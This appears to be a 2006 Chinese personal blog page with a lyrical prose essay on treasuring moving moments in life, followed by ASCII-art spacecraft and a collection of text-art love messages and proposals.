晨曦中,一滴露轻轻滑过绿色的叶尖,如珠滚落在氤氲的朝雾中;夕阳下,一抹闲云徜徉在西边湖光山色间,象火似锦点缀着鸟儿归巢时的聒噪。 一面小窗悄悄打开,迎目的是一片生机盎然的绿,风柔顺得象水,轻轻拂过布满青藤的季节,窗外的竹林中,有条碧草如茵的小径,婉延着伸向炊烟袅袅的小屋,远山在苍茫的暮色中渐渐凝重了,向晚的村落在一种静谧中等待夜的来临。
夜风穿着幽黑的衣裳,慢慢走过村庄的每一个角落,有时如一位老人沉稳中肃穆,冥思中沉默;有时如一位顽皮的孩童,嘻笑着跑过没有关紧的门扉。小屋的小窗中有晕黄的灯渗出,在这样浩淼的夜色中,显得那么娇弱,就是那么坚毅地存在着,温馨中带着点神密。不知道灯的主人是在等待未归的亲人,还是和亲人一起围着灯,把夜编成一片片可以上墙的壁挂。 人生有很多个瞬间,总是不经意地发生、不经意地消失,能给人的只是一种记忆,在很久以后的某一天夜里,会从记忆深处慢慢浮起,象夜空中的星,风起后,云走了,星就再一次照亮寂寞的长空。 每一次感动生命的瞬间,总是那么温柔地过去,留下的印象却是那么悠久,那瞬间总如一位让心情灿烂的朋友,静静地陪伴着每一个风起云涌的昏晨,每当心情因季节霉变、潮湿,每当情绪因怀念潮动、起落,想一想每一个曾经可以感动生命的瞬间,那种感觉就会如一枚青色的橄榄,一种青涩后的清甜透凉,总能让人在迷失的时候清醒,低迷的时节淡化伤痛。
感动生命的每一个瞬间,不是刻意寻找的,是一种自然的采撷,是生命为生命书写的每一段诗行,一草一木、一饮一啜都可能把生命的琴弦拨动,一片月色、一湾秋水也可以让生命在瞬间静穆聆听自然的声音,每一个瞬间,就是每一个荡涤生命的机缘,珍惜不再是一种简单的收藏。 ( Sat, 9 Dec 2006 19:59:20 +0800 )
Description: . .-o . / | . . / | . / | . / | . / / . . / _./ . _.---~-.=:_ (_.-=() lt;~`-`-. _/ _() ~`-==-._, ..--====--' `~-._.__() o===''~~ |__() . \ | . \ \ \ \ . . \ \ . \ \ \_ \ . ~o
…………………………………………………………………………………… __________________________________ |: ``::%H| |%:. Tra ort `:%| |H%::..___________________________:| _._ * _______..........-`-'-..__ / ...###/ \ \ ____\/ ...########/ \ ___...\-- / _ \ __..---#############/_..---''' ========/ // __\___ __..--'' / / / --..__ ```-------________________// = __--'' / / /________= \ //_______= `-.._____ / / / ___ \ ______/__ `````-----------------------////----\----------'''' ______// /_____.....----- Ubrikkian' G*** Q7 Space-trotter
…………………………………………………………………………………… c==o _/____\_ _.,--'" ||^ || quot;`z._ /_/^ ___\|| || _/o\ quot;`-._ _/ ]. L_| || .|| \_/_ . _`--._ /_~7 _ . quot ||. || /] \ ]. (_) . quot;`--. |__7~.(_)_ []|+--+|/____T_____________L| |__| _^(_) /^ __\____ _ _| |__| (_){_) J ]K{__ L___ _ _] |__| . _(_) \v /__________|________ l__l_ (_). []|+-+-\^ L . _ - ---L| \__\ __. ||^l \Y] /_] (_) . _,--' \~_] L_| || .\ .\\/~. _,--' \_\ . __/|| |\ \`-+-' quot;`---._|J__L|X o~~|[\\ \____/ \___|[// `--' `--+-'
…………………………………………………………………………………… __ ____ /._\ \__---____________X__/ .-^~___~Z^-._`'_____ ___~-.______ ___,.---==='~[~~7^___^\-._ 7~_____H__||-. \__.^~~-------...,__ .--^---+-----------Y /\_/\ Y--^Y [_____H__|| ^._______/~~~~^------^---,- |______|___________l [/ \] !___l H quot;^----z^------^----------------{ quot;~^----....________\^---^/_____\ H _.-~_____________,...---------^ ~---~ ~--------^~~~
…………………………………………………………………………………… _ . __CL\H--. L__/_\H' \\--_- __L_(=): ]-_ _-- - T__\ /H. //---- - ~^-H--' quot;
…………………………………………………………………………………… ( Wed, 6 Dec 2006 23:39:19 +0800 )
Description:
你知道吗?告诉你个秘密:
→→ ←←
→→ ● ○ ←←
→→ ■〓□ ←←
→→ ∏ ∧ ←←
→→ ←←
→→ 我 ★★★ 你 ←←
→→ ←←
→→ ←←
→→ 爱 ←←
→→ ←←
→→ ←←
→→←←
→←
……………………………………………………………………………………
███ ███ ◢█◣ █ ★
█▅▅ ▅▅█ █ █ █ ●╭○╮
▃ █ █ ▃ █ █ █ /〓∨◆\
◥█◤ ███ ◥█◤ ▅ ∏ ▲!
……………………………………………………………………………………
┏━┓§---I love you--→§┏━┓
┃我┃ ☆§ξ☆┏━┓☆ξ§☆ ┃你┃
┗━┛* ★ * ┃爱┃* ★ * ┗━┛
* * ≡♂≡ ┗━┛ ≡♂≡ * *
……………………………………………………………………………………
█ ☆真 ◢██◣ █ █* ◢██◣☆
█ ≈ █* █ █* 爱█ █▅▅█
█ * █的 █ ◥◣◢◤ █ 你▂
███◣◥██◤☆ ◥◤ * ◥██◤*
……………………………………………………………………………………
█◢◤ █
█◤ ▄ ◢█◣ ◢█◣╭○╮●
█◥◣ █ ◥█◣ ◥█◣ /■\/■\
█ ◥ █ ◥█◤ ◥█◤ | ||
往事如煙,魂縈夢牽,增添我心中思念;
縱然追尋萬年,今生的情緣不變!
……………………………………………………………………………………
╋━━╋ ┏ ≈☆爱☆≈ ┏我愛你
┃天地┃ ㄖ↘ 心中情人 ↙ㄖ●╭○╮
┃为证┃ ┛既然爱了就┗ /█∨█\鮂F
╋━━╋ →☆海枯石烂☆← ∏ ∏
……………………………………………………………………………………
°·.∴▍★∴ ┏━┓←〓嗨嗨〓
☆.°·▍▍.☆█★ ┃爱┃ ★ ◆
◥█▅▅██▅▅██ ┗━┛ ███◤~
~~◥███I love u forever███◤~~-
……………………………………………………………………………………
◢█◣◢█◣
██████
我的 ◥████◤ 永远属于你!
◥██◤
◥◤
……………………………………………………………………………………
● 请 ◢█◣◢█◣
∠▏ 你 ██████
●Υ ┃ 嫁 ◥████◤
┠┘ ╱╲ 给 ◥██◤
┠╮ ╰┬╯ 我 ◥◤
─╯│ ┙ 吧 !!!!!!!!!!!!!!!!!!!
……………………………………………………………………………………
┏━━┓∴ oooO 心 Oooo ∴┏━━┓
┃天知┃°∴ ( )只( )∴·┃你知┃
┃地知┃∴☆ \ ( 有 ) / ☆∴┃我知┃
┗━━┛★.° \_)你(_/·.★┗━━┛
……………………………………………………………………………………
* * * *
* * * *
* ★ * ★ *
* ★ *
------I love you! ----
* *
* ★ *
* *
* *
*
……………………………………………………………………………………
┏━┓§---I love you--→§┏━┓
◢◤ ◥◣留◢◤◥◣给◢◤ ◥◣
◢◤┏━┓ █ ┏━┓ █ ┏━┓◥◣
█ ┃最┃ █ ┃爱┃ █ ┃的┃ █
◥◣┗━┛ █ ┗━┛ █ ┗━┛◢◤
◥◣ ◢◤爱◥◣◢◤人◥◣ ◢◤
……………………………………………………………………………………
★ ◢◣
◢◢◣ ☆
/○\ ● ◢◢◣◣ ┌────┐
/■\/■\ ◢◢◢◣◣◣ │青梅竹马│
╪═╪ lt;| || ═╪═╪═╪═╪ └┬──┬┘
……………………………………………………………………………………
*/ . ./\~~~~~~~~~~~~~~\. |*`|房|缺|
`\* ,/,.\______________\.■ |子|个|
*|| ..▎田 ▎ |囍|囍| ▎◆ |有|老|
.||##■▎ ▎ | '|' | ▎〓 |了|婆|
……………………………………………………………………………………
.*. /~ .~\ /~ ~\ /~ .~\ /~ ~\
*** ' `\/' * ' `\/' *
V ( MY LOEV TO YOU.*)( . *)
/\|/\ \ 爱你 .*./ \ 万年 . *./
| `\ . . .*/'一 `\ . . .*/'
| `\ * .*. */' _ _ `\ * .*. */'
`\ * */' ( `\/'*) `\ * */'
`\/' \ */' `\/'
`\/'
……………………………………………………………………………………
|_ _| _
| | | | ___ _ _ ___ _ _ ___ _ _
| | | |/ _ \| | | |/ _ \ | | | |/ _ \| | | | _| |_ | | (_) | |_| | __/ | |_| | (_) | |_| |
|_____| |_/\___/ \___/ \___| \__, |\___/ \__,_|
__/ |
|___/
……………………………………………………………………………………
结 婚 喽!!!
━╋━━╋━
━ ━
┏┓ ┏┓
┗┛ ┗┛
━┻━━━┻━
┏━┓ ┏━┓
┗━┛ ┗━┛
……………………………………………………………………………………
◣◢◣◢ 『情』『一』 ◣◢◣◢
◢◎◎◣ 『有』『箭』 ◢◎◎◣
↓██↓ 『独』『钟』 ↓██↓
◢█□□█◣『钟』『情』◢█□□█◣
████████████████████
……………………………………………………………………………………
※━━^-^o美麗人閒蝴蝶國o^-^━━☆特
┃ 結 婚 証 書 ┃此
┃ QQ - 12345 QQ - 67890 ┃証
☆━━^-^o美麗人閒蝴蝶國o^-^━━※明
……………………………………………………………………………………
:∴★∵**☆.∴★∵**☆.::∴★∵*
█████.同一个星空下★..**.
█田█田█.我望著天空的星星雨*
◢██□██◣对你发誓说:我愛你!*^-^
……………………………………………………………………………………
〖曾经〗☆→梦了→愛了→痛了→醒了☆
【如今】☆→傷了→纍了→儍了→怕了☆
〖现在〗☆→断了→忘了→分了→算了☆
〖生活〗☆→坠落→失落→破落→堕落☆
┏我们┓要學会ξ忘情Φ忘愛※忘悲傷Ю
〖E個〗人の↘精彩↙※
……………………………………………………………………………………
(*\/*)遇見你認識你愛上你 ●╭○╮
*\ 愛 /*是我一生最慶信的事 /█∨█\
*\/ 你是我的精神支柱我爱你∏ ∏ 我永远爱你!~~~~~亲爱的~~~!宝贝
……………………………………………………………………………………
我┓↘┏━━━━━━━━┓↙┏在
┗的┓┃愛你≮是无所适┃┏存┛
┗愛┓┃ 从≯的感受 …┃┏伱┛
☆┗只┗━━━━━━━━┛为┛☆
…………………………………………………………………………………… * . : \ | / . ____ . --- / \ --- . . | ~ ~ | . --- \__O_/ --- 你就像太阳 ... / \ 温暧着我心 |
……………………………………………………………………………………
记得我们的星空吗?好美!
. ☆ . ? . ? . ? .
** . ? 〇 ? ? ***N . ? o ? . ? *i**** ? . o ? ? X***J*** __П \ /\ **X*****o* /\ Ц\
……………………………………………………………………………………
∴°★.☆° .★·°∴°★.° .·。∴°
☆ .·°∴° ☆..·°∴°.☆°★°∴°
°∴ 那怕星际无垠 ☆° .·★°∴°.°°
∴°.°★ .·°∴°.°∴°.★☆° .·
°.☆° .★·我也要追到你 °.°°.★
.·°∴★°.°∴°.☆° .·°∴°.°
.·°∴°★.°.∴·°°并永远爱你∴☆°
…………………………………………………………………………………… \\\||/// \\ ~ // ~Q~ 哈哈哈 V
……………………………………………………………………………………
@* .☆ / */ . / * . ☆/ *。 ◢◣。 ◢◣。 ◢★◣。 ◢★◣。 ◢■■◣。 ◢■■◣。
◢■■■◣。 ◢■■■◣。
︸︸||︸︸ !!︸︸||︸︸
愿您有快乐的每一天 ^_^!!
…………………………………………………………………………………… _ _ 嘿嘿嘿嘿
